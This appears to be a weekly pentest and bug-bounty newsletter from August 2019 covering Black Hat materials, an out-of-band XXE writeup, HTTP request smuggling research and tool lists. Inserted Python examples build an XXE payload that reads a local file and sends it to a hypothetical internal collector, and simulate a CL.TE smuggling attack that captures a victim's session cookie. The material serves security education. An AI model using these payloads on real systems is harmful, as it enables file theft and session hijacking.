The 5 Hacking NewsLetter 66

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 02 to 09 of August.


Our favorite 5 hacking items

1. Slides of the week

Black Hat USA 2019 Slides & presentation materials

It feels like Hacker Summer Camp (Black Hat, Defcon, BSides Las Vegas…) has dominated the news this week. A huge chunk of the new vulnerabilities, tools, slides and whitepapers published this week were shared at these events.

So I am not going to share with you all the links because there are way too many. But you can find slides and whitepapers on the Black Hat website. You can start going through that while waiting for the video recordings to come out.

Also here is what I do to find materials on a topic I’m interested in: I check out the talk’s title and author in the presentations schedule or in the workshops page. Then I search for it on Twitter/Google/Github.

For example, I found these using this method:

Also, don’t forget to check out the arsenal section. You won’t necessarily see links to the tools there, but you can find them on Github/Google (e.g. Eyeballer & JSShell).

2. Writeup of the week

Exploiting Out Of Band XXE using internal network and php wrappers

A few days ago, @Zombiehelp54 tweeted about having exploited an XXE despite a firewall blocking all outgoing requests including DNS lookups. That was suspenseful! Here is how he did it:

  • The app had an “xml” parameter that was encrypted
  • The encryption function was readable in JavaScript, but it was hard to read. So he used breakpoints to modify the XML data just before encryption. This allowed him to inject his own encrypted payloads
  • It was possible to inject external entities. The XXE was proved but a firewall blocked all outgoing requests. Only requests to the internal network were allowed and Mahmoud couldn’t fetch external DTD files from his server
  • Using data:// directly didn't work. But the block on external fetches could be sidestepped by pointing the entity at php://filter with a data:// URI as its resource: PHP materialises the DTD from the URI itself, so no DNS lookup or outbound connection is ever made for it
  • Of course, this only works because the app is written in PHP and supports those stream wrappers!
  • The payload was: php://filter//resource=data://text/plain;base64,PCFFTlRJVFkgJSBkYXRhIFNZU1R...

Note that this is just a summary. Check out the writeup, it’s full of awesome advanced XXE exploitation techniques.
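Added example, not from the writeup and not Mahmoud's payload: a stdlib-only Python script that builds the two-stage payload summarised above (an external DTD that reads a file and sends it to a host on the internal network, delivered through php://filter over a data:// URI) and models what PHP's stream layer hands back when libxml asks for that URL. The internal collector http://10.0.0.5/collect, the target file /etc/hostname and the entity names are assumptions; running it against a real PHP application is outside the scope of the script.

```python
"""OOB XXE payload builder for the php://filter + data:// trick.

Added example (not the original writeup's code). The collector host,
target file and entity names below are hypothetical.
"""
import base64
import re
from urllib.parse import unquote

INTERNAL_COLLECTOR = "http://10.0.0.5/collect"  # hypothetical internal host
TARGET_FILE = "/etc/hostname"                   # hypothetical file to read


def build_external_dtd(target_file: str, collector: str) -> str:
    """The DTD the parser must load from outside the document.

    %data holds the file contents; %eval declares a second parameter
    entity whose SYSTEM URL carries %data in its query string; referencing
    %exfil makes the parser request that URL. Parameter-entity references
    inside an entity value are only legal in an external subset, which is
    why this cannot simply be inlined in the DOCTYPE.
    """
    return (
        f'<!ENTITY % data SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{collector}?x=%data;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def wrap_in_php_filter(dtd: str) -> str:
    """Embed the DTD in a data:// URI and hand it to php://filter.

    The parser only asks PHP for 'php://filter//resource=data://...',
    which PHP resolves in-process: no DNS lookup, no outbound connection,
    so an egress firewall never sees the DTD fetch.
    """
    b64 = base64.b64encode(dtd.encode()).decode()
    return f"php://filter//resource=data://text/plain;base64,{b64}"


def build_xxe_document(target_file: str = TARGET_FILE,
                       collector: str = INTERNAL_COLLECTOR) -> str:
    """Full XML document to place in the (decrypted) xml parameter."""
    dtd_url = wrap_in_php_filter(build_external_dtd(target_file, collector))
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE request [\n"
        f'  <!ENTITY % remote SYSTEM "{dtd_url}">\n'
        "  %remote;\n"
        "]>\n"
        "<request>1</request>\n"
    )


def resolve_php_filter_data_uri(url: str) -> bytes:
    """Stand-in for PHP's stream wrapper, not PHP itself.

    Accepts only the exact shape used above and returns the decoded DTD,
    i.e. what libxml receives without any network activity.
    """
    m = re.fullmatch(
        r"php://filter/+resource=data://[^;,]*;base64,(?P<b>[A-Za-z0-9+/=]+)",
        unquote(url),
    )
    if not m:
        raise ValueError(f"unsupported stream URL: {url!r}")
    return base64.b64decode(m.group("b"))


if __name__ == "__main__":
    print(build_xxe_document())
```

Because the DTD here starts with `<!ENTITY % data SYSTEM`, the generated URL begins with the same `PCFFTlRJVFkgJSBkYXRhIFNZU1R` prefix visible in the payload quoted above, which is a quick way to recognise this technique in logs or request captures.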

3. Article / Tool of the week

HTTP Desync Attacks: Request Smuggling Reborn

To be honest, I haven't had the time to properly read this article. But judging from @albinowax's previous research, I know for sure that it's good. He earned over $70k in bug bounties while doing this research!

The attack is a revival of HTTP request smuggling, a technique first described in 2005 and largely forgotten since. It exploits front-end and back-end servers disagreeing on where one request ends and the next begins (typically Content-Length versus Transfer-Encoding: chunked), so bytes the front-end treats as the body of one request become the start of another request at the back-end. It can lead to bypassing security controls or accessing other users' sensitive data, and can be chained with Web cache poisoning and XSS.
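As an added example that is not from James's paper or PortSwigger's tooling, here is the CL.TE case in plain Python: two toy request framers, one that trusts Content-Length (the front-end) and one that trusts Transfer-Encoding: chunked (the back-end), are fed the same byte stream. The host vulnerable.example, the /admin path, the smuggled prefix and the victim's cookie are constructed for the demo.

```python
"""CL.TE request smuggling, shown as two framers that disagree.

Added example (not the article's code). Hosts, paths and cookies are
made up; the framers are deliberately minimal and not real servers.
"""
from typing import Dict, List, Optional, Tuple

Request = Tuple[bytes, Dict[bytes, bytes], bytes]  # (request line, headers, body)


def _parse_head(stream: bytes) -> Optional[Tuple[bytes, Dict[bytes, bytes], bytes]]:
    """Split off request line + headers; None if the head is incomplete."""
    if b"\r\n\r\n" not in stream:
        return None
    head, _, rest = stream.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def _read_chunked(rest: bytes) -> Optional[Tuple[bytes, bytes]]:
    """Decode a chunked body; return (body, remainder) or None if incomplete."""
    body = b""
    while True:
        if b"\r\n" not in rest:
            return None
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)
        if size == 0:                       # last chunk, then an empty trailer
            if b"\r\n" not in rest:
                return None
            _, _, rest = rest.partition(b"\r\n")
            return body, rest
        if len(rest) < size + 2:
            return None
        body += rest[:size]
        rest = rest[size + 2:]              # drop chunk data and its CRLF


def frame_by_content_length(stream: bytes) -> Tuple[List[Request], bytes]:
    """Front-end: frames by Content-Length, ignores Transfer-Encoding."""
    out: List[Request] = []
    while True:
        parsed = _parse_head(stream)
        if parsed is None:
            return out, stream              # leftover bytes wait for more data
        line, headers, rest = parsed
        n = int(headers.get(b"content-length", b"0"))
        if len(rest) < n:
            return out, stream
        out.append((line, headers, rest[:n]))
        stream = rest[n:]


def frame_by_transfer_encoding(stream: bytes) -> Tuple[List[Request], bytes]:
    """Back-end: chunked wins over Content-Length (RFC 7230 section 3.3.3)."""
    out: List[Request] = []
    while True:
        parsed = _parse_head(stream)
        if parsed is None:
            return out, stream
        line, headers, rest = parsed
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            decoded = _read_chunked(rest)
            if decoded is None:
                return out, stream
            body, stream = decoded
        else:
            n = int(headers.get(b"content-length", b"0"))
            if len(rest) < n:
                return out, stream
            body, stream = rest[:n], rest[n:]
        out.append((line, headers, body))


def build_clte_attack(prefix: bytes, host: bytes = b"vulnerable.example") -> bytes:
    """Content-Length covers the 0-chunk terminator plus the smuggled prefix,
    so the front-end forwards everything while the back-end stops at the
    terminator and keeps the prefix as the start of the next request."""
    body = b"0\r\n\r\n" + prefix
    return (b"POST / HTTP/1.1\r\nHost: " + host + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n" + body)


SMUGGLED_PREFIX = b"GET /admin HTTP/1.1\r\nFoo: x"   # hypothetical target path
VICTIM_REQUEST = (b"GET /account HTTP/1.1\r\nHost: vulnerable.example\r\n"
                  b"Cookie: session=victim-session\r\n\r\n")


def demo() -> dict:
    """Attacker's request followed by an unrelated user's request on the same connection."""
    stream = build_clte_attack(SMUGGLED_PREFIX) + VICTIM_REQUEST
    fe, fe_pending = frame_by_content_length(stream)
    be, be_pending = frame_by_transfer_encoding(stream)
    return {
        "frontend_lines": [r[0] for r in fe],
        "backend_lines": [r[0] for r in be],
        "backend_second_headers": be[1][1] if len(be) > 1 else {},
        "frontend_pending": fe_pending,
        "backend_pending": be_pending,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

demo() shows the front-end forwarding two ordinary-looking requests (POST / and the victim's GET /account) while the back-end has turned the attacker's trailing bytes into a GET /admin whose Foo header swallowed the victim's request line and which now carries the victim's Cookie. Real servers differ in which header they honour and in how they normalise obfuscated Transfer-Encoding values, which is exactly what the labs exercise.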

The awesome part is that, since James works at PortSwigger, a Burp extension to scan for Request Smuggling bugs is already available. A new scan check was also added to the Burp scanner. And a new lesson was added to the Web Security Academy (with 12 labs).

Also, he only tested approx 5% of bug bounty sites, so there’s still room for us mortals to play with this bug.

4. Podcast of the week

🔴 404 Podcast Not Found #4 w/ PwnFunction

This is a cool podcast episode if you’re looking for something to pass the time while commuting, walking or exercising.

It’s not technical at all, it’s more in the entertainment category. But it’s nice getting to know the mysterious @PwnFunction. Also I love the trivia quiz, wish it was longer!

5. Videos of the week

GitHub Recon and Sensitive Data Exposure, Advanced Burp Suite, Recon & Discovery, XML External Entity Injection & Server Side Request Forgery

Wow, that’s a lot to watch! My hacker watchlist keeps growing alarmingly these days.

Bugcrowd University just dropped 5 new videos on recon, Github, Burp, XXE and SSRF. They look really interesting. And judging from their length, there is probably something new to learn here for everyone.

Other amazing things we stumbled upon this week

Videos

Podcasts

Conferences

Slides & Material

Tutorials

Medium to advanced

Beginners corner

Writeups

Challenge writeups

Pentest writeups

Responsible(ish) disclosure writeups

Bug bounty writeups

See more writeups on The list of bug bounty writeups.

Tools

If you don’t have time

  • Cloudflare-origin-ip.py: A script to perform automatic Cloudflare bypass test through Censys
  • XFFenum: X-Forwarded-For [403 forbidden] enumeration
  • Timeinator: Burp extension that can be used to perform timing attacks over an unreliable network such as the internet

More tools, if you have time

  • Confluence_searcher.py: Python3 script to help search Confluence for different key words & output the results to a csv. Change the URL api path based on your installation
  • Orca: Targeted OSINT Framework
  • Irule-detector: Burp extension that detects F5 BigIP vulnerable to an RCE affecting the iRule feature
  • SMTPTester: Small python3 tool to check common vulnerabilities in SMTP servers
  • AttackSurfaceMapper: A tool that aims to automate the reconnaissance process
  • PyDNSRecon / Runbooks: Subdomain enumeration tool that uses Censys.io, Amass & Sonar FDNS data
  • Marzavec/run.js: Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
  • LittleBrother: Information gathering (OSINT) on a person (EU). No API key or login needed

Misc. pentest & bug bounty resources

Challenges

Articles

News

Bug bounty & Pentest news

Reports

Vulnerabilities

Breaches & Attacks

Other news

Non technical

Tweeted this week

We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 08/02/2019 to 08/09/2019


Curated by Pentester Land & Sponsored by Intigriti

Have a nice week folks!

If you want to be notified when new articles (including this newsletter) are published, you can subscribe to this blog.

And if you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…

